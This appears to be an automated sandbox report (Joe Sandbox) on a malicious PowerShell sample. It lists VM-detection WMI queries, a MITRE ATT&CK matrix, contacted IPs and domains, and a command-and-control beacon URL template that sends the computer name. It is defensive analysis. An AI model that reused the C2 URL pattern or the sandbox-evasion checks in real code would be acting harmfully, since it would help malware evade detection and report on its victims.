Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9930Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.35029076745.000001753C230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWht%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.35016420016.0000017533FEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.34952327482.00000175219E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.35028400390.000001753BFCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatusx
Source: powershell.exe, 00000000.00000002.35029076745.000001753C230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.34952327482.00000175219E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590049 Sample: download.ps1 Startdate: 13/01/2025 Architecture: WINDOWS Score: 72 13 lggknhaffleahbh.top 2->13 15 www.google.com 2->15 21 Suricata IDS alerts for network traffic 2->21 23 Multi AV Scanner detection for submitted file 2->23 7 powershell.exe 14 32 2->7         started        signatures3 process4 dnsIp5 17 lggknhaffleahbh.top 45.61.136.138, 49754, 80 AS40676US United States 7->17 19 www.google.com 142.251.167.147, 49755, 80 GOOGLEUS United States 7->19 25 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->25 27 Queries memory information (via WMI often done to detect virtual machines) 7->27 29 Queries Google from non browser process on port 80 7->29 31 Loading BitLocker PowerShell Module 7->31 11 conhost.exe 7->11         started        signatures6 process7

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps15%ReversingLabsWin32.Trojan.Generic
download.ps115%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.pngh0%Avira URL Cloudsafe
http://lggknhaffleahbh.top0%Avira URL Cloudsafe
http://$2p3ixaq4wkv1zjf/$nw32m1jk8b4t7eh.php?id=$env:computername&key=$fswpmlx&s=5270%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.pngXzw0%Avira URL Cloudsafe
https://apis.google.comXzw0%Avira URL Cloudsafe
https://oneget.org0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
lggknhaffleahbh.top
45.61.136.138
truetrue
    unknown
    www.google.com
    142.251.167.147
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/false
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://$2p3ixaq4wkv1zjf/$nw32m1jk8b4t7eh.php?id=$env:computername&key=$fswpmlx&s=527powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.35016420016.0000017533F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533ECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017523E6E000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schema.org/WebPagepowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.000001752531B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.00000175251E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533ECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FEC000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://lh3.googleusercontent.com/ogw/default-user=s24hYpowershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://apis.google.comXzwpowershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schema.org/WebPageXzwpowershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://lh3.googleusercontent.com/ogw/default-user=s96Xzwpowershell.exe, 00000000.00000002.34954117551.0000017524C1E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/Pester/PesterXzwpowershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/powershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.34954117551.0000017527104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525E4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.google.compowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017523E6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://apis.google.compowershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533ECC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.34953626098.0000017523B45000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.micrpowershell.exe, 00000000.00000002.35025295907.000001753BD10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.34954117551.0000017523CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://lggknhaffleahbh.toppowershell.exe, 00000000.00000002.34954117551.0000017523E4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.34954117551.0000017527104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525E4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.34954117551.0000017525C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533ECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.000001752533B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://pesterbdd.com/images/Pester.pnghpowershell.exe, 00000000.00000002.34954117551.0000017526F92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526FBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525CDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://lh3.googleusercontent.com/ogw/default-user=s24Xzwpowershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.google.com/preferences?hl=enpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://pesterbdd.com/images/Pester.pngXzwpowershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlXzwpowershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.34954117551.000001752533B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lh3.googleusercontent.com/ogw/default-user=s24hpowershell.exe, 00000000.00000002.34954117551.000001752533B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/Pester/Pesterhpowershell.exe, 00000000.00000002.34954117551.0000017526F92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526FBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525CDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 00000000.00000002.34954117551.0000017526F92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526FBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525CDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.quovadis.bm0powershell.exe, 00000000.00000002.34953626098.0000017523B45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.34954117551.0000017523CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://oneget.orgpowershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              45.61.136.138
                                                                                                              lggknhaffleahbh.topUnited States
                                                                                                              40676AS40676UStrue
                                                                                                              142.251.167.147
                                                                                                              www.google.comUnited States
                                                                                                              15169GOOGLEUSfalse
                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                              Analysis ID:1590049
                                                                                                              Start date and time:2025-01-13 14:40:12 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 5m 33s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                              Run name:Suspected VM Detection
                                                                                                              Number of analysed new started processes analysed:4
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:download.ps1
                                                                                                              Detection:MAL
                                                                                                              Classification:mal72.evad.winPS1@2/8@2/2
                                                                                                              EGA Information:Failed
                                                                                                              HCA Information:
